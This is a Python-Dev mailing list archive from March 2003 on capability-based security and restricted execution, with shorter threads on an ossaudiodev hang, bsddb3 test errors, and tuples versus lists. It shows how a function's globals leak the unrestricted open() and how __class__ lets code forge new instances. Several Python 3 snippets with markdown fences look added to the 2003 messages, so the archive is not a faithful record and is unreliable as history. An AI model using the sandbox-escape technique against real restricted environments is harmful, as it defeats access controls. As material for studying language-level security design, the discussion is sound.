> used?  I believe that a "cap-Python" would support those uses,
> implementing the same security policies, but more cleanly since
> access control would be a first-class part of the language.
> 
> I don't know Zope very well, and rather than guess, I'd like to ask
> someone who does know Zope to give a typical example of how proxies
> are used in workaday Zope.  I suspect that capabilities are quite
> similar to Zope proxies.

Yes.

> Now for a quick made-up example to demonstrate what I meant about
> expressing security policy above, consider a tic-tac-toe game that
> is supposed to draw to the screen.
> 
> In "restricted Python v1", certain modules have been flagged as
> "safe" and others "unsafe".  Code can execute other code with a
> "restricted" flag set, something like this:
> 
> # restricted Python v1
> game = eval(TicTacToeGame, restricted=True)
> game.display()
> 
> Unfortunately, in "restricted Python v1", all of the modules that
> allow drawing to the screen are marked as "unsafe", so the
> tic-tac-toe-game immediately dies with an exception.
> 
> In "restricted Python v2", an arbitrary security policy can be implemented:
> 
> # restricted Python v2
> games=[]
> def securitypolicy(subject, action, object):
>     if (subject in games) and (
>         ((action == "import") and (object == "wxPython")) or
>         ((action == "execute") and (object == "wxPython.Window")) or
>         ((action == "execute") and (object == "wxPython.Window.paint"))):
>         return True
>     # ...
>     return False
> 
> game = eval(TicTacToeGame, policy=securitypolicy)
> games.append(game)
> game.display()
> 
> I think that the "rexec" design was along the lines of "restricted
> Python v2", but I apologize if this simple analogy insults anyone.

Not really.  The rexec design gives you the tools to implement either
v1, v2 or v3.  Its basic features are more like v1, but it has a
concept of Zope-like proxies, named Bastions, and it allows you to use
functions or bound methods as capabilities.  Bastions are mostly a
convenience to allow a bunch of capabilities to be used like an
object.  The "security policy" you sketch as part of v2 would be
possible but there aren't really any hooks to implement this; you'd
have to craft it out of Bastions and capabilities.

> I'm not sure whether "restricted Python v2" is expressive enough to
> implement the capability security access control model or not, but I
> don't care, because I don't like "restricted Python v2".  I like
> restricted Python v3:
> 
> # restricted Python v3
> game = TicTacToeGame()
> game.display(wxPython.wxWindow())
> 
> Now the game object has a reference to the window object, and it can
> use that reference to draw the pictures.  If I later change this
> design and decide that instead of drawing to a window, I want the
> game to write to a file, then I'll change the implementation of the
> TicTacToeGame class, and then I'll come back here to this code
> and change it from passing a wxWindow to:
> 
> # restricted Python v3
> game = TicTacToeGame()
> game.display(open("/tmp/tttgame.out","w"))
> 
> Now if I were writing in "restricted Python v2", then in addition to
> those two changes I would also have to make a third change, which is
> to edit my securitypolicy function in order to allow this particular
> game object to access a file named "/tmp/tttgame.out", and to
> disallow it access to wxPython:
> 
> # restricted Python v2
> def securitypolicy(subject, action, object):
>     if (subject in games) and (action in ("read", "write",)) and (object == "file:/tmp/tttgame.out"):
>         return True
>     # ...
>     return False
> 
> game = TicTacToeGame()
> game.display("/tmp/tttgame.out")
> 
> This is what I meant by saying that the security policy is expressed
> in Python instead of by twiddling access bits in an embedded policy
> language.  In a capability-secure language, the change (which the
> programmer has to make anyway), from "wxPython.wxWindow()" to
> "open('/tmp/tttgame.out', 'w')" is necessary and sufficient to
> enforce the programmer's intended security policy, so there is no
> need for the redundant and brittle "policy" function.
> 
> I find this unification of access control and application logic to
> resonate deeply with the Zen of Python.

Me too.
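
A runnable toy version of the "v3" style may help.  In this sketch the
game is handed a reference to the one thing it may use, and nothing
else.  The board logic and the write_only helper are invented for the
illustration.  Note also that in ordinary Python the closure is still
reachable by introspection, so this shows the programming style, not an
actual security boundary.

```python
import io


class TicTacToeGame:
    def __init__(self):
        self.board = [[" "] * 3 for _ in range(3)]

    def move(self, row, col, mark):
        self.board[row][col] = mark

    def display(self, out):
        # The game can only use what it was handed: something with write().
        for row in self.board:
            out.write("|".join(row) + "\n")


def write_only(stream):
    """Return a facet of `stream` that exposes write() and nothing else."""

    class Facet:
        __slots__ = ()

        def write(self, text):
            return stream.write(text)

    return Facet()
```

Switching the game from one destination to another then means passing a
different object to display(); there is no separate policy to update.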

> Regards,
> 
> Zooko
> 
> [1] http://www.eros-os.org/papers/shap-thesis.ps
> [2] http://www.research.microsoft.com/~lampson/09-Protection/Acrobat.pdf
> [3] http://citeseer.nj.nec.com/blaze96decentralized.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@gmx.net  Tue Mar 11 15:12:41 2003
From: ark@gmx.net (Arne Koewing)
Date: Tue, 11 Mar 2003 16:12:41 +0100
Subject: [Python-Dev] Re: Audio devices
References: <20030311141559.GA15139@cthulhu.gerg.ca>
Message-ID: <87zno2ym1i.fsf@gmx.net>

Greg Ward <gward@python.net> writes:

> Of course, this will lead people to hardcode "/dev/dsp" (and/or
> "/dev/mixer") into their Python audio scripts.  That's bad if other
> OSS-using operating systems have different names for the standard audio
> devices.  Do they?

with devfs (Linux) this would be /dev/sound/dsp and /dev/sound/mixer
(but there are compatibility links...)


From guido@python.org  Tue Mar 11 16:20:18 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:20:18 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: Your message of "Tue, 11 Mar 2003 10:58:41 EST."
 <20030311155841.GB14963@cthulhu.gerg.ca>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com>
 <20030311155841.GB14963@cthulhu.gerg.ca>
Message-ID: <200303111620.h2BGKJn27187@odiug.zope.com>

> On 11 March 2003, Guido van Rossum said:
> > Great!  I wonder if you have any thoughts on why running
> > test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
> > using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
> > useful to debug this.

[Greg]
> The most obvious cause is that some other process has the audio device
> open, and your audio {hardware, device driver} only allows one at a
> time.

Hm, but I *do* hear some sound coming out of the speaker: a quiet,
sped-up squeaky version of the "nobody expects the spanish
inquisition" soundclip that test_linuxaudiodev also used to play.
(The latter now crashes for me with "linuxaudiodev.error: (0,
'Error')".)

> If you're running one of those newfangled GUI environments like KDE or
> GNOME, it's quite likely that the esound or aRTSd (however you spell it)
> daemon started when you logged in, and is thus blocking all access to
> your /dev/dsp.  This sucks, but IMHO it's not ossaudiodev's job to know
> about esound and similar.
> 
> One way to test this is to take your system down to single-user (or at
> least a console-only, no-X11 runlevel) and then try running
> test_ossaudiodev.

I tried this at runlevel 1, and the symptoms are identical: some
squeaks, then it hangs.

> Hmmm, it looks like calling open() with O_NONBLOCK helps.  I know this
> does *not* affect later read()/write() -- there's a special ioctl() for
> non-blocking read/write -- but it *does* appear to fix blocking open().
> At least for me it turned a second open() attempt on the same device
> from "hang" to "IOError: [Errno 16] Device or resource busy:
> '/dev/dsp2'".
> 
> Try this patch; if it works I'll check it in:
> 
> --- Modules/ossaudiodev.c       10 Mar 2003 03:17:06 -0000      1.24
> +++ Modules/ossaudiodev.c       11 Mar 2003 15:56:24 -0000
> @@ -131,7 +131,7 @@
>            basedev = "/dev/dsp";
>      }
>  
> -    if ((fd = open(basedev, imode)) == -1) {
> +    if ((fd = open(basedev, imode|O_NONBLOCK)) == -1) {
>          PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
>          return NULL;
>      }
> 
> test_ossaudiodev.py will still need fixing to handle the EBUSY error,
> but at least this should prevent hanging on open().

Yes, it fixes the hang.  Please check it in!

The sample is still played at too high a speed, but maybe that's
expected?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Tue Mar 11 16:33:51 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:33:51 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Tue, 11 Mar 2003 09:59:59 +1300."
 <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>
Message-ID: <200303111633.h2BGXum27649@odiug.zope.com>

[Greg Ewing]
> I think I agree that to really get on top of this security business we
> need to move towards having dangerous things forbidden by default
> rather than allowed by default.

This is more or less what the rexec module implements, except for
convenience it has a list of unsafe built-ins rather than a list of
safe built-ins.

> To that end, it would be useful if we could pin down exactly what's
> dangerous and what isn't.  It seems to me that most uses of
> introspection by most programs are harmless. Can we sort out those
> (hopefully few) things that are dangerous, and separate them from the
> existing introspection mechanisms?

Maybe, maybe not.  The original restricted execution code (not the
rexec module) arbitrarily decided that setting class attributes was
dangerous but getting them was not.  Samuele found that new-style
classes allow both, but always disallow write-access to the class
__dict__ (you have to use the setattr protocol); this is good or bad
depending on how it's used.

The real problem is that harmful access may be granted via
innocent-looking access.  For example, allowing read-only access to a
function's globals gives you access to the unrestricted 'open'
function...
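
A small demonstration of that leak, written with today's attribute
names (__globals__ rather than the func_globals of this era).  The
function names are made up for the example.

```python
def harmless():
    return 42


def find_open(func):
    """Recover the real open() from nothing but a function object."""
    builtins_ns = func.__globals__["__builtins__"]
    # __builtins__ is a module in __main__ and a plain dict elsewhere.
    if not isinstance(builtins_ns, dict):
        builtins_ns = vars(builtins_ns)
    return builtins_ns["open"]
```

Nothing here writes to anything; read access alone is enough to get
from an innocent function to the unrestricted built-in.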

> Access to sys.modules has been mentioned as a key thing that needs to
> be restricted. Maybe this shouldn't be an arbitrarily-accessible
> variable?  Maybe the sys module shouldn't be a module at all, but some
> special object that won't let you do nasty things with its contents
> unless you've got special privileges (which most code would *not*
> have by default). 

That's pretty much what the rexec module implements; it overrides
__import__ and when you ask for sys, you get a fake sys that only
contains stuff that should be safe.

> One of the "nasty" things would be picking the real __builtins__ out
> of sys.modules. Are there any others?

Picking an unsafe extension module out of sys.modules.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Tue Mar 11 17:02:36 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Tue, 11 Mar 2003 18:02:36 +0100
Subject: [Python-Dev] Capabilities
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>  <200303111633.h2BGXum27649@odiug.zope.com>
Message-ID: <054701c2e7f0$0435d7c0$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
> [Greg Ewing]
> > I think I agree that to really get on top of this security business we
> > need to move towards having dangerous things forbidden by default
> > rather than allowed by default.
>
> This is more or less what the rexec module implements, except for
> convenience it has a list of unsafe built-ins rather than a list of
> safe built-ins.
>
> > To that end, it would be useful if we could pin down exactly what's
> > dangerous and what isn't.  It seems to me that most uses of
> > introspection by most programs are harmless. Can we sort out those
> > (hopefully few) things that are dangerous, and separate them from the
> > existing introspection mechanisms?
>
> Maybe, maybe not.  The original restricted execution code (not the
> rexec module) arbitrarily decided that setting class attributes was
> dangerous but getting them was not.  Samuele found that new-style
> classes allow both, but always disallow write-access to the class
> __dict__ (you have to use the setattr protocol); this is good or bad
> depending on how it's used.

but given that methods can be overridden per instance with classic classes:

class C:
  def f(s):
    ...

c=C()
c.f = lambda s: s

it was not so effective.

> The real problem is that harmful access may be granted via
> innocent-looking access.  For example, allowing read-only access to a
> function's globals gives you access to the unrestricted 'open'
> function...

restricted execution alone for example does not have a notion of subclassable
vs. non subclassable classes,
and given its approach, subclassing can be dangerous.

For sure a good thing would be for func_* and im_* attributes of functions and
methods to be substituted by special accessor functions/objects, independently
of restricted mode.

Functions and methods should be basically opaque to normal code.


From ping@zesty.ca  Tue Mar 11 17:24:13 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Tue, 11 Mar 2003 11:24:13 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E6CB1D8.4050108@zope.com>
Message-ID: <Pine.LNX.4.33.0303111113480.26020-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Jim Fulton wrote:
> Ka-Ping Yee wrote:
> > Here's a preliminary description of the boundary between "introspective"
> > and "restricted", off the top of my head:
> >
> >     1.  The only thing you can do with a bound method is to call it
> >         (bound methods have no attributes except __doc__).
>
> Well, I see no harm and much usefulness
> in allowing __name__, __repr__, and __str__.

Depends.  In a truly secure system, classes would only reveal
information about themselves if they wanted to.  The default
__repr__ gives away the id() of the instance, and __name__
gives away the name of the method, which would prevent you
from creating proxies that are indistinguishable from the
original.  Sometimes it is useful to be able to do that.

> >     2.  The following instance attributes are off limits:
> >         __class__, __dict__, __module__.
>
> I generally want to be able to get the __class__. This is harmless
> in my case, because I get a proxy back.

We definitely do not want to provide access to __class__.
Access to an instance should not give you the power to create
more instances of its class.  If you passed somebody a file
object, access to the class would convey the power to open any
file on the filesystem!
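
The same point with a toy class, since the file example depends on the
file type of this era.  Purse and forge_purse are invented names; the
sketch only shows that a reference to one instance, plus __class__, is
enough to mint another.

```python
class Purse:
    """Toy capability: holding a reference lets you spend its balance."""

    def __init__(self, balance):
        self._balance = balance

    def spend(self, amount):
        if amount > self._balance:
            raise ValueError("insufficient funds")
        self._balance -= amount
        return amount


def forge_purse(some_purse, balance):
    # Holding one purse should not grant this, but __class__ does.
    return some_purse.__class__(balance)
```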

> > However, there is still the problem that the established technique
> > for storing instance-specific state in Python is to use globally-
> > accessible data attributes instead of a limited scope.  We would
> > also need to add a safe (private) place for instances to put state.
>
> I don't understand why this is necessary. In general, you want to
> restrict what attributes (data, properties, methods, etc.) are accessible
> in certain situations. I don't follow what makes data attributes special.

Instances currently don't have a private place to put their state,
and unless there is a convenient way to do that, implementers will
tend to expose their instance state in public data attributes.

Even if the instance had properties, the properties still (as yet)
have no way to conveniently distinguish if access is being attempted
from within an instance method, or from outside the instance.


-- ?!ng


From ping@zesty.ca  Tue Mar 11 17:28:59 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Tue, 11 Mar 2003 11:28:59 -0600 (CST)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303101540.h2AFeW012107@odiug.zope.com>
Message-ID: <Pine.LNX.4.33.0303111124220.26020-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Guido van Rossum wrote:
> [Ping]
> > By the way -- to avoid confusion between "proxies used to wrap
> > unrestricted objects in order to make them into secure objects" and
> > "proxies used to reduce the interface of an existing secure object",
> > let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> > discussion so far), and call the second a "facet" (which is the term
> > commonly used when capabilities people talk about reducing an interface).
>
> Hm, I'm not sure I understand the difference between the two
> definitions you give.  What does "making something into a secure
> object" mean if not "reducing its interface"?  And what is the
> fundamental difference between a secure object and an insecure one?
> In my world view there's a gradual difference.

I acknowledge that it's not perfectly black and white, but what
i meant in the above is that a "secure object" is one that exposes
only its declared interface.

The key difference i'm getting at is whether the interface is the
one intended by the programmer.  Proxies are for ensuring that
the interface doesn't leak things the programmer never intended;
facets are for the programmer to intentionally reduce the interface
of an already secure object to limit its powers.

Er, perhaps another way of saying it is that proxies are at the
system level and facets are at the user level.
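
A facet in this sense might look like the following sketch (present-day
Python 3; Counter and read_only_facet are hypothetical names).  Note that in
ordinary Python the closure is still inspectable through read.__closure__,
which is the kind of leak the system-level proxy would have to close.

```python
class Counter:
    """Hypothetical full-powered object."""

    def __init__(self):
        self._n = 0

    def increment(self):
        self._n += 1

    def read(self):
        return self._n


def read_only_facet(counter):
    # Hand out a function that can read but not increment.
    def read():
        return counter.read()
    return read


counter = Counter()
counter.increment()
facet = read_only_facet(counter)
print(facet())
```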


-- ?!ng


From pedronis@bluewin.ch  Tue Mar 11 17:30:27 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Tue, 11 Mar 2003 18:30:27 +0100
Subject: [Python-Dev] Capabilities
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>  <200303111633.h2BGXum27649@odiug.zope.com> <054701c2e7f0$0435d7c0$6d94fea9@newmexico>
Message-ID: <062d01c2e7f3$e82b0d80$6d94fea9@newmexico>

From: "Samuele Pedroni" <pedronis@bluewin.ch>
> For sure a good thing would be for func_* and im_* attributes of
> functions and methods to be substituted by special accessor
> functions/objects, independently of restricted mode.

to clarify:

I mean something like

func_globals(f)

vs

f.func_globals

regards
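
A sketch of the accessor form in present-day Python 3, where the attribute is
spelled __globals__ instead of func_globals.  The free function func_globals()
is hypothetical; presumably its appeal is that a function can simply be left
out of a restricted namespace, whereas an attribute travels with every
reference to f.

```python
def func_globals(f):
    """Hypothetical accessor; Python 3 spells the attribute __globals__."""
    return f.__globals__


def sample():
    return 1


# Both spellings reach the same dictionary today.
same = func_globals(sample) is sample.__globals__
print(same)
```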


From ben@algroup.co.uk  Tue Mar 11 17:50:38 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 11 Mar 2003 17:50:38 +0000
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303101538.h2AFcTR12087@odiug.zope.com>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org> <200303101538.h2AFcTR12087@odiug.zope.com>
Message-ID: <3E6E21EE.50709@algroup.co.uk>

Guido van Rossum wrote:
>>Ben Laurie wrote:
>>There seems to be a persistent confusion here that i would like
>>to dispel: a capability is not a single lambda.
> 
> 
> I guess, I misunderstood..  I was sure that Ben told me this was so.
> Apparently I misread, or you have a different definition of capability
> than he does (wouldn't be the first time.)

The thing is that a capability is a pretty abstract notion. You can 
implement them as classes or as lambdas - I initially did them as 
classes, but decided that lambdas were neater, at least in the context 
of Python. I could be wrong. It could just be my particular bias, which 
is why I'd prefer, ideally, to be able to do either.

I'm sure if people want to be definition lawyers they can find 
documentation explaining why either of those isn't quite right, but I'm 
interested in functionality and the functionality is available either way.
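
The two styles can be put side by side in a short sketch (present-day
Python 3; ReadCap, make_read_cap and the dict-backed store are hypothetical).
Both grant the same single power, reading one key.

```python
class ReadCap:
    """Capability as a class: wraps a hypothetical dict-backed store."""

    def __init__(self, store, key):
        self._store = store
        self._key = key

    def __call__(self):
        return self._store[self._key]


def make_read_cap(store, key):
    # Capability as a lambda: store and key live only in the closure.
    return lambda: store[key]


store = {"motd": "hello"}
cap_a = ReadCap(store, "motd")
cap_b = make_read_cap(store, "motd")
print(cap_a(), cap_b())
```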

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From greg@cosc.canterbury.ac.nz  Tue Mar 11 21:08:44 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 12 Mar 2003 10:08:44 +1300 (NZDT)
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <2mfzpufb6u.fsf@starship.python.net>
Message-ID: <200303112108.h2BL8ii29619@oma.cosc.canterbury.ac.nz>

> I think Jeff was suggesting that we implement it like this:
> 
> def plumb(cmd):
>     import Tkinter
>     return Tkinter.call('exec ' + cmd)

But then you'd be going through the bottleneck of a
string syntax with all its attendant quoting problems.
The whole point of my suggestion was to avoid that!
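
The quoting problem can be illustrated by analogy in present-day Python 3.
The sketch uses shlex, which follows POSIX shell rules rather than Tcl's, and
a hypothetical filename; it only shows why a list of arguments is safer than
one concatenated string.

```python
import shlex

filename = "my report.txt"  # hypothetical argument containing a space

# Building one command string and re-parsing it splits the name in two.
as_string = shlex.split("cat " + filename)

# Passing arguments as a list keeps each one intact; nothing is re-parsed.
as_list = ["cat", filename]

print(as_string)
print(as_list)
```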

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From gward@python.net  Tue Mar 11 21:44:50 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 16:44:50 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111620.h2BGKJn27187@odiug.zope.com>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com> <20030311155841.GB14963@cthulhu.gerg.ca> <200303111620.h2BGKJn27187@odiug.zope.com>
Message-ID: <20030311214450.GA16297@cthulhu.gerg.ca>

On 11 March 2003, Guido van Rossum said:
> Yes, it fixes the hang.  Please check it in!

OK, done.

> The sample is still played at too high a speed, but maybe that's
> expected?

No, definitely not.  On my system, it sounds the same as it has with
linuxaudiodev for quite a while, and the same as it did with sunaudiodev
on my old Sun box at CNRI before that.

*Maybe* there's something wrong with how setparameters() initializes the
audio device.  Try this patch and see how it goes:

--- Lib/test/test_ossaudiodev.py        14 Feb 2003 19:29:22 -0000      1.4
+++ Lib/test/test_ossaudiodev.py        11 Mar 2003 21:42:31 -0000
@@ -52,8 +52,10 @@
     a.fileno()
 
     # set parameters based on .au file headers
-    a.setparameters(rate, 16, nchannels, fmt)
-    a.write(data)
+    a.setfmt(fmt)
+    a.channels(nchannels)
+    a.speed(rate)
+    a.writeall(data)
     a.flush()
     a.close()
 

Hmmm, I just noticed that setting O_NONBLOCK at open() time *does* have
an effect -- I needed to change that write() to writeall() in order to
hear the whole test sound.  Uh-oh.
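
The difference between the two calls can be sketched as follows (present-day
Python 3).  FakeDevice is a hypothetical stand-in that accepts at most four
bytes per write(); a real non-blocking device may also accept nothing at all
when busy, in which case a real writeall() would have to wait before retrying.

```python
class FakeDevice:
    """Hypothetical non-blocking device: at most 4 bytes per write()."""

    def __init__(self):
        self.received = b""

    def write(self, data):
        chunk = data[:4]
        self.received += chunk
        return len(chunk)  # number of bytes actually accepted


def writeall(dev, data):
    # Keep calling write() until every byte has been accepted.
    while data:
        written = dev.write(data)
        data = data[written:]


dev = FakeDevice()
dev.write(b"0123456789")      # a single write() silently drops the tail
after_one_write = dev.received

dev2 = FakeDevice()
writeall(dev2, b"0123456789")
print(after_one_write, dev2.received)
```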

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
"... but in the town it was well known that when they got home their fat and
psychopathic wives would thrash them to within inches of their lives ..."


From skip@pobox.com  Tue Mar 11 22:20:07 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 11 Mar 2003 16:20:07 -0600
Subject: [Python-Dev] bsddb3 test errors - are these expected?
Message-ID: <15982.24855.181016.568236@montanaro.dyndns.org>

I just tried running regrtest with "-uall,-largefile" (after a "cvs up",
"./config.status --recheck", and "make") on my Mac OS X system.  It chugged
for awhile, then spit this out several times:

    Exception in thread reader 4:
    Traceback (most recent call last):
      File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 411, in __bootstrap
        self.run()
      File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 399, in run
        self.__target(*self.__args, **self.__kwargs)
      File "/Users/skip/src/python/head/dist/src/Lib/bsddb/test/test_thread.py", line 270, in readerThread
        rec = c.first()
    DBLockDeadlockError: (-30995, 'DB_LOCK_DEADLOCK: Locker killed to resolve a deadlock')

once for each thread, then this:

    /Users/skip/src/python/head/dist/src/Lib/bsddb/dbutils.py:67: RuntimeWarning: DB_INCOMPLETE: Cache flush was unable to complete
      return function(*_args, **_kwargs)

After chugging awhile longer, it segfaulted.

What (if anything) can I do to provide useful inputs to someone who can
possibly fix the problem?

Skip


From fincher.8@osu.edu  Tue Mar 11 19:49:42 2003
From: fincher.8@osu.edu (Jeremy Fincher)
Date: Tue, 11 Mar 2003 14:49:42 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <15982.24855.181016.568236@montanaro.dyndns.org>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
Message-ID: <200303111449.42035.fincher.8@osu.edu>

There are many places in the standard library where some code either iterates 
over a literal list or checks for membership in a literal list.  I'm curious 
if it would be considered productive and useful to go through and change 
those places to iterate over/check for membership in literal tuples instead 
of lists.  The tuple, I think, more closely reflects the read-only literal 
nature of the code and is slightly faster to boot.  (Not that the speed 
really matters, I'm sure there aren't any such tests in performance-sensitive 
locations).

Would such an endeavor be useful?  Would a patch to that effect be accepted?

Jeremy


From nas@python.ca  Wed Mar 12 00:05:06 2003
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 11 Mar 2003 16:05:06 -0800
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303111449.42035.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu>
Message-ID: <20030312000505.GA26614@glacier.arctrix.com>

Jeremy Fincher wrote:
> Would such an endeavor be useful?  Would a patch to that effect be accepted?

I doubt it.  It would be more useful to look over the list of open
patches and bugs and find something that you can help on.

  Neil


From guido@python.org  Wed Mar 12 02:11:12 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 21:11:12 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Tue, 11 Mar 2003 14:49:42 EST."
 <200303111449.42035.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
Message-ID: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>

> There are many places in the standard library where some code either
> iterates over a literal list or checks for membership in a literal
> list.  I'm curious if it would be considered productive and useful
> to go through and change those places to iterate over/check for
> membership in literal tuples instead of lists.  The tuple, I think,
> more closely reflects the read-only literal nature of the code and
> is slightly faster to boot.

-1.

I bet you can't prove the speed-up.

Tuples are for heterogeneous data, lists are for homogeneous data.
Tuples are *not* read-only lists.

Tuples require extra care in case the number of elements shrinks to 1.
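
A short sketch of that pitfall in present-day Python 3 (the names are
hypothetical).  Dropping an element from a two-item tuple literal without
keeping a trailing comma leaves a plain string, and "in" then does a
substring test.

```python
names = ("spam", "eggs")
one_name_wrong = ("spam")    # just a parenthesized string, not a tuple
one_name_right = ("spam",)   # the trailing comma makes it a tuple

print("pa" in one_name_wrong)   # True: substring test on a str
print("pa" in one_name_right)   # False: membership test on a tuple
```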

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Wed Mar 12 02:15:38 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 11 Mar 2003 21:15:38 -0500
Subject: [Python-Dev] bsddb3 test errors - are these expected?
In-Reply-To: <15982.24855.181016.568236@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHMEAAB.tim.one@comcast.net>

[Skip Montanaro]
> I just tried running regrtest with "-uall,-largefile" (after a "cvs up",
> "./config.status --recheck", and "make") on my Mac OS X system.
> It chugged for awhile, then spit this out several times:
>
>     Exception in thread reader 4:
>     Traceback (most recent call last):
>       File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 411, in __bootstrap
>         self.run()
>       File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 399, in run
>         self.__target(*self.__args, **self.__kwargs)
>       File "/Users/skip/src/python/head/dist/src/Lib/bsddb/test/test_thread.py", line 270, in readerThread
>         rec = c.first()
>     DBLockDeadlockError: (-30995, 'DB_LOCK_DEADLOCK: Locker killed to resolve a deadlock')
>
> once for each thread,

I believe those are timing-related and harmless.  It would be better if the
test suite suppressed such msgs, if so.

> then this:
>
>     /Users/skip/src/python/head/dist/src/Lib/bsddb/dbutils.py:67: RuntimeWarning: DB_INCOMPLETE: Cache flush was unable to complete
>       return function(*_args, **_kwargs)

That's not good, though.

> After chugging awhile longer, it segfaulted.

Nor that.

> What (if anything) can I do to provide useful inputs to someone who can
> possibly fix the problem?

Sorry, no idea.  Is the pybsddb SF project still open for business?


From tismer@tismer.com  Wed Mar 12 03:39:26 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 12 Mar 2003 04:39:26 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6EABEE.2040108@tismer.com>

Guido van Rossum wrote:
...

> Tuples are for heterogeneous data, lists are for homogeneous data.
> Tuples are *not* read-only lists.

Oh!

Did you point that out anywhere, before, and I missed it?

Are you thinking of lists as to be really somehow
being homogeneous data, in a sense to be replaceable
by some array optimization, sometimes, while tuples aren't?

I never realized this, and I'm a bit stunned.
(but by no means negative about it, just surprised)

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From fincher.8@osu.edu  Wed Mar 12 01:03:08 2003
From: fincher.8@osu.edu (Jeremy Fincher)
Date: Tue, 11 Mar 2003 20:03:08 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303112003.08689.fincher.8@osu.edu>

On Tuesday 11 March 2003 09:11 pm, Guido van Rossum wrote:
> I bet you can't prove the speed-up.

Here's the script I used to test it:

import timeit

report = \
"""
Size: %s
Tuple Time: %s
List Time: %s
List Time - Tuple Time: %s
"""

if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        # sys.argv holds strings; xrange() below needs an integer.
        upperLimit = int(sys.argv[1])
    else:
        upperLimit = 10
    for i in xrange(upperLimit):
        lst = range(i)
        tpl = tuple(lst)
        tupleTimer = timeit.Timer('%s in %r' % (upperLimit, tpl))
        listTimer = timeit.Timer('%s in %r' % (upperLimit, lst))
        minTupleTime = min(tupleTimer.repeat())
        minListTime = min(listTimer.repeat())
        difference = minListTime - minTupleTime
        print report % (i, minTupleTime, minListTime, difference)

There seems to be a constant 1.3 usec or so difference between creating a 
